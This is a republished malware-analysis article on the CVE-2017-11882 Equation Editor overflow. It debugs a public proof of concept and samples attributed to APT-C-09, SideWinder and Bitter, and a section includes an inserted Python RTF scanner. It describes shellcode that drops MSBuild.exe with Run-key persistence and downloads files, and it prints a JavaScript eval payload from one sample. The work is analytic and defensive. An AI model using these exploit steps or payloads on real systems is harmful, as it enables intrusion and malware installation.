
CVE-2017-11882 and Analysis of Exploit Samples

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

In this issue, the editor presents CVE-2017-11882 together with an analysis of samples that exploit it. The article is detailed and approaches the topic from a professional point of view; I hope you get something out of reading it.

0x01 Vulnerability description

Cause: the Windows Equation Editor EQNEDT32.EXE, when reading OLE data that contains MathType formula data, copies the formula font name without checking its length. An attacker can therefore craft the data so that the copy overwrites the function's return address on the stack and hijacks control flow.

Affected versions: Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, Microsoft Office 2016

POC: https://github.com/Ridter/CVE-2017-11882

0x02 Vulnerability analysis

Reproduction and analysis environment: Windows 7 Service Pack 1, Microsoft Office 2010, x32dbg, IDA 7.0.

Confirm that EQNEDT32.EXE (the Equation Editor) is present:

Create the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE:

Set its Debugger value to the path of x32dbg, so that the debugger is attached every time the Equation Editor starts.

Generate the POC:

Open the document and set a breakpoint on WinExec():

Once the breakpoint hits, check the return address on the stack:

Walk further up the stack to find the function that calls WinExec():

Analyze sub_4115A7 in IDA:

Follow into sub_41160F:

The length is never checked and strcpy() is called directly, so this should be where the vulnerability is triggered. To pin down the exact location:

Set a breakpoint at 0x411658 and run again. When it hits for the second time, inspect the memory that ESI points to:

At this point ECX is 0xC, i.e. 0xC dwords (48 bytes) are about to be copied to the memory EDI points to, while var_28 is actually only 36 bytes:

Run to the end of the function:

After the leave instruction executes, the value at the top of the stack (0x18F1D0) is 0x430C12, which is where WinExec() is called. Its argument is the cmd command line in memory at 0x18F350:

The calculator pops up successfully:

The following is a brief analysis of the POC used. The meaning of each variable is clear from its name. The RTF document format is not the focus of this article; readers unfamiliar with it are advised to read the article on the RTF format linked in the references at the end before looking at the POC source code.

First, the POC checks that the command length is less than 43; the number 43 comes from:

The selected part of the image above is where the command is inserted; the exact offset is given by the COMMAND_OFFSET (0x949*2) variable in the POC.

After the command has been inserted into the constructed data, the function returns the assembled OLE object, which is then embedded into the RTF document:

0x03 Analysis of an APT-C-09 group sample

MD5: 0D38ADC0B048BAB3BD91861D42CD39DF

Set a breakpoint at 0x411658; when it hits for the second time, the registers hold the following values:

Continue to the leave instruction at the end of the function:

The value 0x430**7 at address 0x18F230 is the overwritten return address of the function:

The instruction at this address is ret, which is somewhat unexpected. Continue executing to 0x18F3B0, the value stored at address 0x18F234:

This is the code the sample's author intends to execute. After the series of operations in the blue box, EBX points to the real shellcode:

All of the above can be seen in the OLE object (path \xl\embeddings):

After copying the data at OLE offsets 0x1000-0x1520 into a bin file and loading it in IDA, the function sub_247 looks as follows:

The second parameter this function takes is the address EBX pointed to above, which is offset 0x1040 in the OLE; the content at 0x1040+0x558 is as follows:

The first job of this function is therefore to fix up the PE file header. The flow of the second function is as follows:

It writes the PE file data following 0x1040+0x558 to %APPDATA%\MSBuild.exe. The flow of the third function is as follows:

It writes %APPDATA%\MSBuild.exe to the registry Run key under the value name lollipop.

0x04 Analysis of a SideWinder (rattlesnake) group sample

Drag the document into WinHex to view it:

You can see that the document is essentially in RTF format.

The analysis with rtfobj.py is as follows:

The Package object will be discussed later; first let's look at the CVE-2017-11882 exploitation part.
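The RTF and OLE layers that both the POC above and this sample rely on can be checked without a debugger. The following is an added example, not code from the original article or from rtfobj.py: it decodes the \objdata hex of an RTF, walks the OLE 1.0 wrapper to the Equation Editor data, and measures the MTEF FONT record name against the 36-byte var_28 buffer identified earlier. The helper names, the constructed test document, and the 28-byte Equation Editor header / 5-byte MTEF header offsets are assumptions of this example, not values taken from the article.

```python
import re
import struct

BUFFER_LEN = 36          # var_28 in sub_41160F: the FONT name is copied here with no length check
EQNOLEFILEHDR_LEN = 28   # Equation Editor header that precedes the MTEF byte stream (assumed layout)
MTEF_HDR_LEN = 5         # MTEF header: version, platform, product, product version, subversion
FONT_TAG = 0x08          # MTEF FONT record: tag, typeface, style, NUL-terminated font name
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")

def decode_objdata(rtf: bytes) -> list:
    """Decode every \\objdata hex run in the RTF into raw OLE 1.0 bytes."""
    return [bytes.fromhex(re.sub(rb"\s", b"", m.group(1)).decode()) for m in OBJDATA_RE.finditer(rtf)]

def parse_ole1(blob: bytes):
    """OLE 1.0 header: version, format id, three length-prefixed strings, native size -> (class, native)."""
    off, names = 8, []
    for _ in range(3):
        (n,) = struct.unpack_from("<I", blob, off)
        names.append(blob[off + 4:off + 4 + n].rstrip(b"\0").decode("latin-1"))
        off += 4 + n
    (size,) = struct.unpack_from("<I", blob, off)
    return names[0], blob[off + 4:off + 4 + size]

def font_name_lengths(native: bytes) -> list:
    """Heuristic: only FONT records are interpreted; bytes of other records are skipped one by one."""
    body, i, lengths = native[EQNOLEFILEHDR_LEN + MTEF_HDR_LEN:], 0, []
    while i < len(body):
        if body[i] == FONT_TAG:
            end = (body + b"\0").find(b"\0", i + 3)      # NUL after the name (or end of data)
            lengths.append(end - (i + 3))                # bytes between the style byte and the NUL
            i = end
        i += 1
    return lengths

def scan_rtf(rtf: bytes) -> list:
    """(class name, longest FONT name, overflow?) per object; strcpy adds a NUL, so name + 1 must fit."""
    out = []
    for blob in decode_objdata(rtf):
        cls, native = parse_ole1(blob)
        longest = max(font_name_lengths(native), default=0) if "Equation" in cls else 0
        out.append((cls, longest, longest + 1 > BUFFER_LEN))
    return out

def build_sample(font_name: bytes) -> bytes:
    """Constructed test document (not a real sample): RTF > OLE1 > EQNOLEFILEHDR > MTEF."""
    mtef = bytes([3, 1, 1, 3, 0x0A, 0x0A, 1, FONT_TAG, 0x5A, 0x5A]) + font_name + b"\0\0"
    hdr = struct.pack("<HIHI", EQNOLEFILEHDR_LEN, 0x00020000, 0x8000, len(mtef)) + bytes(16)
    lpstr = lambda s: struct.pack("<I", len(s) + 1) + s + b"\0"
    ole1 = struct.pack("<II", 0x501, 2) + lpstr(b"Equation.3") + bytes(8) + struct.pack("<I", len(hdr) + len(mtef)) + hdr + mtef
    return b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata " + ole1.hex().encode() + b"}}}"
```

A benign document yields a short name and no flag, while a name of 36 bytes or more is reported as overflowing var_28, since the terminating NUL is copied as well.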

Again, when the breakpoint hits for the second time:

The subsequent execution flow is similar to the previous sample:

After the series of operations in the green box, GlobalLock() is called with the following parameters:

Next, execution jumps into the memory region returned by GlobalLock():

After two call instructions:

Fix up the string in memory:

Next, locate kernel32.dll:

The functions it calls are as follows:

After two call instructions:

Its job is to return the address of a given function, this time LoadLibraryW():

Next, it returns the address of GetProcAddress():

Continue with the call instruction:

The subsequent process is shown in the figure:

Next, the string is decrypted and overwrites the original CommandLine content:

The results are as follows:

Finally, the actual execution part:

javascript:eval("sa=ActiveXObject;ab=new sa(\"Scripting.FileSystemObject\");eval(ab.OpenTextFile(ab.GetSpecialFolder(2)+\"\1.a\",1).ReadAll();windowclose()")

Then RunHTMLApplication() is called:

1.a is the Package object in the RTF document mentioned earlier; it is essentially a JS file:

Finally, the execution result is roughly as shown in the following figure:

0x05 Analysis of a Bitter group sample

A document in RTF format is downloaded via remote template injection:

Drag it into WinHex to confirm that it is in RTF format:

After adding the file extension, open the document. Again, at the second break at 0x411658:

The jump is followed by the series of calculations in the green box, then another jump:

fldpi loads the value of π onto the FPU stack:

After it executes, fpu_instruction_pointer points to the fldpi instruction, and the following fnstenv instruction saves the FpuSaveState structure at esp-0xC:

The instruction-pointer field sits at offset 0xC of that structure, so saving it at esp-0xC places the field exactly at [esp]; after pop ebp, EBP therefore holds fpu_instruction_pointer, the address of the fldpi instruction:

The start of the data to be decrypted is computed from EBP, and the data length (0x315) is held in EDX:

Then the decryption instructions execute:

After the jump, the corresponding instructions execute, followed by a call:

The function sub_562B2F obtains the address of a requested system function, this time kernel32.VirtualAlloc():

VirtualAlloc() is then called to allocate memory:

Data is written into the allocated memory:

sub_562B2F is called to get the address of kernel32.Wow64DisableWow64FsRedirection():

LoadLibrary(shell32):

The parameter is passed to sub_562B2F to get the address of shell32.ShellExecute():

LoadLibrary(urlmon):

Get the address of urlmon.URLDownloadToFile():

URLDownloadToFile() is called with the parameters shown in the figure:

Read the file:

Because the file could not be retrieved, the computed EBX value is incorrect:

The above is the editor's account of CVE-2017-11882 and the analysis of samples that exploit it. If you have similar questions, you may refer to the analysis above. To learn more, follow the industry information channel.
